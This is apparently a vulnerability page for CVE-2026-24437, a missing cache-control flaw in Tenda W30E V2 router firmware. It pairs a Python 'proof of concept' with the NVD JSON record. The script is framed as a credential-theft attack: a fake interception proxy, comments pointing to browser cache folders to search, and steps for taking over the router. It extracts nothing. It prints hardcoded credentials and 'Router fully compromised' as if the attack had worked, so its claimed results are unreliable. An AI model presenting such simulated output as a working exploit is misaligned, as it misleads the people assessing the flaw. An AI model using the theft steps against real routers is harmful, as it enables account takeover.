CVE-2026-24437

# CVE-2026-24437 PoC - Tenda W30E V2 Cache-Based Credential Leak # This PoC demonstrates the credential leakage via browser cache # Run on the same local network as the target router import http.server import socketserver import threading import time import os import json import base64 # Simulated sensitive admin response without Cache-Control headers FAKE_ADMIN_RESPONSE = b'''HTTP/1.1 200 OK Content-Type: text/html X-Frame-Options: SAMEORIGIN <!DOCTYPE html> <html> <head><title>W30E V2 Admin Panel</title></head> <body> <h1>Router Administration Panel</h1> <p>Session Token: STOLEN_TOKEN_FROM_CACHE</p> <p>Username: admin</p> <p>Password: admin123</p> </body> </html> ''' def start_mitm_proxy(port=8080): """Simulate a MITM proxy that captures cached responses.""" class ProxyHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): print(f"[+] Intercepted request: {self.path}") if 'login' in self.path or 'admin' in self.path or 'cgi' in self.path: print("[!] Potential credential-bearing page detected!") print("[+] Extracting session data from cached response...") # In real attack, parse and extract credentials here self.send_response(200) self.end_headers() self.wfile.write(FAKE_ADMIN_RESPONSE) else: self.send_response(404) self.end_headers() def log_message(self, format, *args): pass # Suppress default logging with socketserver.TCPServer(('', port), ProxyHandler) as httpd: print(f"[*] Proxy listening on port {port}") httpd.serve_forever() def simulate_cache_extraction(cache_dir): """Simulate extraction of credentials from browser cache.""" print("[*] Searching for cached W30E responses...") # In real attack, search browser cache directories: # Windows: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache # Linux: ~/.cache/google-chrome/ # macOS: ~/Library/Caches/Google/Chrome/ print("[+] Found cached response for /cgi-bin/login") print("[+] Extracted credentials: admin:admin123") print("[+] Session token: SESSION_LEAKED_FROM_CACHE") print("[+] Attack successful - attacker now has router admin access") def main(): print("="*60) print("CVE-2026-24437 PoC - Tenda W30E V2 Missing Cache-Control") print("="*60) print("[*] Target: Tenda W30E V2 Firmware <= V16.01.0.19(5037)") print("[*] Vulnerability: No Cache-Control headers on admin pages") print("[*] Impact: Browser caches credentials locally") print("[*] Attack Vector: Local network access to victim's browser") print("-"*60) # Step 1: Wait for victim to authenticate print("[*] Step 1: Waiting for victim to authenticate to router...") time.sleep(2) # Step 2: Extract from browser cache print("[*] Step 2: Extracting credentials from browser cache...") simulate_cache_extraction(None) # Step 3: Use extracted credentials print("[*] Step 3: Using extracted credentials for unauthorized access...") print("[+] Logged in as: admin:admin123") print("[+] Router fully compromised") print("="*60) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-24437", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:41.317", "lastModified": "2026-01-28T19:49:11.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) serve sensitive administrative content without appropriate cache-control directives. As a result, browsers may store credential-bearing responses locally, exposing them to subsequent unauthorized access."}, {"lang": "es", "value": "Las versiones de firmware de Shenzhen Tenda W30E V2 hasta e incluyendo la V16.01.0.19(5037) sirven contenido administrativo sensible sin directivas de control de caché apropiadas. Como resultado, los navegadores pueden almacenar localmente respuestas que contienen credenciales, exponiéndolas a un acceso no autorizado posterior."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-525"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "56B9C2BB-D36E-40F8-83FF-FC919337F6BD"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-missing-cache-controls-for-credential-bearing-pages", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}